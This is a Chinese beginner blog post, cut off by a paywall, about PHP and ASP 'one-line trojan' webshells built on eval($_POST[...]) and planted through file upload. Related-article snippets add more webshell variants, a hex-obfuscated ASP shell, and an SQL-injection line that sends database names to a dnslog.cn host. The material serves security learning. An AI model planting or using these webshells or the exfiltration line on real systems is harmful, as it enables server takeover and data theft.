一句话木马简单实践

最新推荐文章于 2024-06-09 15:59:40 发布
最新推荐文章于 2024-06-09 15:59:40 发布
阅读量1.8k 收藏 20
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48732306/article/details/111319495
版权

最近学习看到了一句话木马这个东西,觉得很有意思,那就来试试吧!

什么是一句话木马:

类似于<?php @eval($_POST['qiuy']);?>,POST里面的就是我们的链接密码。这句话是很明显就是一个PHP一句话木马。eval()这个函数的作用就是把参数当作PHP代码来执行,无论你传入的是啥。比如:
eval(echo flag.txt),那么就执行了echo flag.txt这个命令。
类似的还有asp的一句话木马:<%eval request(“qiuy”)%>

如何使用?

首先要把我们的一句话木马生成为一个文件,比如Php的一句话木马,可以新建一个文本,输入一个一句话木马,并把文件名后缀改为.php,这样我们的一句话小木马就形成了。
接着我们就可以去上传我们的木马文件来做邪恶的事情了…
为了方便验证且不违法,我这里使用了自己的网站来测试,大家也可以自己搭建一个服务器来测试,关于如何搭建自己的服务器我会在末尾简单介绍一下。
新建一个木马文件:在这里插入图片描述把他的后缀改为.php,这里的qiuy你可以自由更改

很快啊,就弹出了在这里插入图片描述

不过不用慌,这就是我们自己写的代码,能弹出这个ÿ

最低0.47元/天 解锁文章
真的安全吗
关注
  • 5
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
一句木马原理与实战
V
07-30 3219
一句木马原理与实战介绍常用一句木马分析一句木马一句使用方法实战 介绍 一句木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终有强大的作用。 常用一句木马 php一句木马:    <?php @eval($_POST[value]);?>    aspx一句木马:   <%@ Page Language=“Jscript”%>   <%eval(Re...
Web安全-用一句木马拿下RDCTF靶机实战1
qq_46231152的博客
09-15 613
一句木马 一句木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 本次使用的php一句: <?php @eval($_POST['1']) ?> 用这段代码保存为一个php后门木马 上传木马 本次使用的是RDCTF平台的靶机实战 进入管理员后台界面 找到附件管理,发现了这里可以上传文件 将写好的一句木马上传 回到首页,找到文件上传的网页 找到一句木马文件 使用蚁剑连接 拿到flag ...
一句木马实践
wjj985666的博客
11-16 694
POST里面的就是我们的链接密码,wjj是参数,这句就是一个PHP一句木马。3、复制木马文件上传的地址 使用中国蚁剑 右键添加数据 蚁剑的安装及使用教程可以自行查找。首先要把我们的一句木马生成为一个文件,把文件名后缀改为.php,一句木马就形成了。基本原理:运用文件上传漏洞往目标网站中上传一句木马。密码为函数的$_POST['wjj']里面的wjj。之后通过dvwa平台的文件上传文件,实践木马。2、打开File Upload上传木马文件。首先用记事本创建一个简单的一句木马
webshell基本原理和使用(一句木马实践
m0_65853019的博客
06-09 1266
webshell的基本原理和使用
aspx一句木马_这场旋转的木马主题婚礼,实战太梦幻了
weixin_34885009的博客
12-28 78
旋转的木马和粉色的棉花糖,都被锁上了名为成长的锁。但总有人会拿着对的钥匙,小心翼翼打开,放出那些你五彩斑斓的梦,圆满你的所有期待和梦想。也许这就是遇上对的人的状态吧,小心呵护你所有的天真的梦想,细心为你编织一个五彩斑斓的童梦,做那个无忧无虑的小公主。童是五彩斑斓充满童趣的,在高饱和度的色彩下附上了一层梦幻的色彩。因此,在颜色的选择上,我们选用静谧蓝和茱萸粉这一对极富艺术气息的浪漫色彩来为这场婚...
一句木马该怎么实现?现在就带你了解
kali_Ma的博客
07-30 5382
前言 一直以来,Java一句木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去一个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出一种Java一句木马:利用Java中JS引擎实现的一句木马。 基本原理 Java没有eval函数,Js有eval函数,可以把字符串当代码解析。 Java从1.6开始自带ScriptEng
一句木马要点和防范注意事项
05-24
例如,一个简单的PHP一句木马可能如下所示: ```php ($_GET['cmd']); ?> ``` 这个例子中,`eval`函数会执行通过GET参数`cmd`传入的任何PHP代码,从而让攻击者能够控制服务器。 了解了一句木马的基本原理后,...
基于 python 实现的千倍速一句木马密码爆破工具
最新发布
07-05
一句木马 【作品名称】:基于 python 实现的千倍速一句木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
一句 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php一句cmdshell新型 (非一句木马)
10-30
【PHP 一句 CMDShell 新型(非一句木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句木马是直接执行 PHP ...
一句木马全攻略
天马行空
05-21 1682
大家都知道入侵网站拿Webshell的时候一般思路有备份和上传小马然后写大马。然后比较多的就是用一句来拿Webshell.但是对于新手。如何正确使用一句呢?这就是本问讲到的,请大家看下文---------------------------------------------------------------------------------------------------
一句木马(绝对入门,实战环境安装+测试)主要是记录我的第一次一句木马过程,复现40分钟左右。
ntrybw的博客
06-21 635
变成一个可执行代码,然后就可以传入并且执行,这个代码的作用就是可以让你接触到服务器,然后获得服务器的控制权,就等于完成了渗透操作,卧槽,第一次接触,发现真的好有意思。之后也就等于拿到了这个服务器的权限,不得不说,日站是真有意思,比misc好玩多了,怪不得学渗透可以没日没夜,太有意思了,这只是一个开始,有感而发记录一下。传完之后告诉我success,然后给了一个文件路径,因为这个网站在我本地,所以我可以在本地看一下,就可以在本地这个目录下发现这个文件。现实渗透肯定没有那么简单,不过深入,沉淀,网安之路。
使用一句木马进行读取文件flag,不能链接木马管理工具时
02-17 908
a=echo file_get_contents("../../../flag");
SQL注入篇——一句木马
爱国小白帽
01-08 6366
一、利用sql注入上传一句木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
文件上传一句木马
weixin_46601529的博客
09-14 791
准备工具 上传的文件(一句木马) 蚁剑,菜刀 需要攻击的网站 将<?php @eval($_POST['shell']);?>写入一个Php文件 ## 第二步寻找网站上传点,并将webshell.php文件上传 最后寻找文件上传地址 利用蚁剑打开网站 登陆网站寻找在home中寻找到了flag ...
一句木马
无言道的博客
02-09 2671
简介:一句木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 举例说明 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码: <%execute request(“value”)%> 其中value是值,所以你可以更改自己的值,前面的request就是获取这个值 <%eval request(“value”)%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用) 当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell.
excel一句木马
01-26
Excel一句木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值